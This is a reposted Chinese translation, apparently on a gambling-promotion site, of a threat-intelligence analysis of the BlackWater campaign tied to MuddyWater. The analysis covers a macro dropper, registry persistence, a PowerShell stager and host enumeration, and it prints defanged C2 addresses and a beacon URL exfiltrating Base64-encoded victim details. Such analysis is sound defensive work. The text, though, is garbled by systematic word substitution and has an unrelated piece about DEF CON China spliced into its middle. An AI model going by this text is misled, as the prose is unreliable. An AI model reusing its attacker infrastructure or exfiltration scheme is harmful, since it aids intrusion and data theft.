运用新型反检测手艺:与MuddyWater相干的BlackWater歹意运动剖析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

运用新型反检测手艺:与MuddyWater相干的BlackWater歹意运动剖析

申博_新闻事件 申博 66次浏览 未收录 0个评论

择要

Cisco Talos团队近期发明名为“BlackWater”的歹意运动与可疑的延续要挟构造MuddyWater相干联。在2019年4月,我们最先监测到新型样本,并对其举行剖析,效果注解进击者已在通例的运营运动中增加了三个分歧的步调,许可歹意软件绕过某些平安掌握,而且MuddyWater的战略、手艺和流程(TTPs)已发展到回避检测阶段。一旦胜利,该歹意软件系列会将基于PowerShell的后门安装到受害者的盘算机上,从而为要挟介入者供应长途接见的权限。只管新型歹意运动注解,要挟介入者正在接纳步伐来进步其运营历程的平安性,并尽量回避终端检测,但我们发明其基础代码依然连结稳定。本文中所形貌的剖析效果将有助于要挟剖析团队辨认MuddyWater最新的TTP。

在最新的歹意运动中,要挟行动者起首增加了一个经由殽杂后的Visual Basic for Applications(VBA)剧本,经由过程竖立注册表项的体式格局来竖立持久性。接下来,该剧本将触发PowerShell Stager,多是为了伪装成红方东西,而不会被认为是高等要挟。随后,Stager将与一个要挟行动者掌握的服务器举行通讯,以取得FruityC2署理剧本的一个组件,这是GitHub上的一个开源框架,能够进一步罗列主机。这样一来,要挟介入者就能够监控Web日记,并肯定未介入运动的或人是不是向其服务器发出要求以实验视察该运动。一旦罗列敕令运转,署理将与分歧的C2举行通讯,并在URL字段中发还数据。这样一来,基于主机的检测将会变得越发难题,由于这一历程当中并不会天生易于辨认的“errors.txt”文件。要挟介入者还接纳了分外的步调来替代近期最新样本中的一些变量字符串,这多是为了制止依据Yara划定规矩举行基于署名的检测。

在近几个月内视察到的相干歹意样本显现,歹意运动的庞杂水平赓续增添。一些疑似与MuddyWater相干的样本注解,在2019年2月至3月时期,要挟介入者在受沾染的主机上竖立了持久性,并运用PowerShell敕令罗列受害者的主机IP地点以及敕令与掌握(C2)服务器的IP地点。所有这些组件都包罗在木马化的附件里,因而平安职员只需取得文档的样本,便可发明进击者的TTP。与之比拟,4月发作的歹意运动须要接纳多步调的视察要领。

BlackWater文档剖析

Talos团队发明有证据注解歹意样本疑似与歹意构造MuddyWater有关。MuddyWater自2017年11月起至今一向活泼,而且重要针对中东地区的实体。我们有肯定证据推断,这些文件是经由过程收集垂纶电子邮件的体式格局发送给受害者的。个中的一个木马文件竖立于2019年4月23日,其原始文件的题目是“company information list.doc”。

运用新型反检测手艺:与MuddyWater相干的BlackWater歹意运动剖析

文档翻开后,它会提醒用户启用称号为“BlackWater.bas”的宏。要挟行动者对宏增加了暗码保护,若是用户试图在Visual Basic中检察宏,能够会发明该宏无法接见,这多是一种防逆向手艺。要挟行动者运用了替代暗码对“blackWater.bas”宏举行了殽杂,并运用响应的整数来替代字符。

宏运转时的截图:

运用新型反检测手艺:与MuddyWater相干的BlackWater歹意运动剖析

该宏中包罗一个PowerShell剧本,能够在“运转”注册表项KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding中增加条目,从而包管持久性。然后剧本每300秒挪用一次文件“\ProgramData\SysTextEnc.ini”。SysTextEnc.ini的明文版本似乎是一个轻量级的Stager。

从文档中找到的Stager的屏幕截图:

运用新型反检测手艺:与MuddyWater相干的BlackWater歹意运动剖析

随后,Stager衔接位于hxxp://38[.]132[.]99[.]167/crf.txt的要挟行动者掌握的C2服务器。crf.txt文件的明文版本异常类似于MuddyWater构造在以土耳其的Krudish政治构造为目的时运用的PowerShell署理。下面的截图中展现了PowerShell木马的前几行。进击者做了一些细小的修正,比方:修正变量名以制止Yara检测,将敕令效果发送到URL中的C2而不是直接将它们写入文件。然则,只管有上述这些修正,但歹意软件的基础功用依然是几乎没有转变。值得注意的是,用于罗列主机的很多PowerShell敕令似乎是从名为FruityC2的GitHub项目中派生出来的。

针对Krudish政治构造提议进击的歹意文档中嵌入的PowerShell剧本:

百度平安马杰向人人发问:给你2000万,你想用来做什么?

如果有人对问你“给你一笔用来投资的巨款,你会来投资什么?”这个问题,你会如何回应? 是投资房地产?还是投资自己?亦或是投入到金融市场“让钱生钱”? 现在,看似玩笑话的事情确实曾经发生过:百度安全的马杰就遇到了这个问题。 给你2000万,你想用来做什么? 作为百度安全这艘巨轮的总舵手,给出的答案也是超脱小编我自己的认知水平的。下面是由马杰本人写的《给你2000万,你想用来做什么?》,里面就有他的答案。 给你2000万,你想用来做什么? 作者:马杰 很久没安静下来写点什么,那自然是想要聊点重要的事情。 如题,如果给你2000万,你想用来做什么? 我的选择,是办了这场DEF CON CHINA,本周五,就要开幕了。 安全圈的朋友不必多言,圈外的朋友我简单解释。 DEF CON,世界最顶级的安全会议,安全界的“奥斯卡”;与其同期举行的DEF CON CTF,世界最高水平的CTF网络安全竞赛,安全界的“世界杯”。去年,DEF CON首次进入中国,DEF CON CHINA由此而来,去年是Beta,今年是1.0。同时,我们也举办了BCTF,今年正式成为了DEF CON CTF的外卡赛,也就是这里得了冠军,直接进世界杯的16强。 你可以理解为,这是一场全球Hacker的大会,亦或说Party,或者理解成任何你想理

运用新型反检测手艺:与MuddyWater相干的BlackWater歹意运动剖析

来自要挟行动者所掌握服务器的PowerShell剧本:

运用新型反检测手艺:与MuddyWater相干的BlackWater歹意运动剖析

这一系列敕令,起首会向C2服务器发送hello音讯,然后每隔300秒发送一次后续的hello音讯。该信标的一个示例是“hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”。值得注意的是,木马化歹意文档的宏也被称为“BlackWater”,而且该值“BlackWater”也被以硬编码的花样写入到PowerShell剧本中。

接下来,该剧本将罗列受害者的主机。大多数PowerShell敕令都邑挪用Windows Management Instrumentation(WMI),然后查询以下信息:

1. 操作体系的称号(即主机称号);

2. 操作体系的OS架构;

3. 操作体系的版本;

4. 盘算机体系的域名;

5. 盘算机体系的用户名;

6. 盘算机的公网IP地点。

在这里,独一一个没有挪用WMI的敕令是“System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash”,这是猎取平安体系的MD5哈希值的敕令。若是多个事情站在统一收集中被攻下,那末能够会猎取事情站的独一标识。在猎取基于主机的罗列信息以后,它将举行Base64编码,然后将编码后的内容附加到URL POST要求中发送至C2。而在之前的版本中,该信息被写入到文本文件中。编码后敕令的示比方下所示:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE=

经由解码后,上述敕令将变得越发清楚:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\admin*192.168.000.01

总结

除本文中形貌的新型反检测要领以外,MuddyWater构造还举行了少许修正,以制止罕见的基于主机的特性检测要领,并替代变量称号以回避Yara特性检测。但这些转变是异常简朴的,由于其基础代码库和植入功用依然基础连结稳定。但是,只管这些修正异常细小,但它们足以制止某些检测机制。在上个月,MuddyWater的一些歹意运动被公然表露,但该构造没有遭到这方面的影响,延续展开歹意运动。基于上述视察以及MuddyWater针对土耳其实体的汗青歹意运动,我们有理由推断,这一系列歹意运动与MuddyWater歹意构造相干。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明运用新型反检测手艺:与MuddyWater相干的BlackWater歹意运动剖析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址